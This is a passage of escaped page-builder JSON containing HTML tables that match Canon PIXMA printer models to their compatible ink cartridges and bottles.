MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 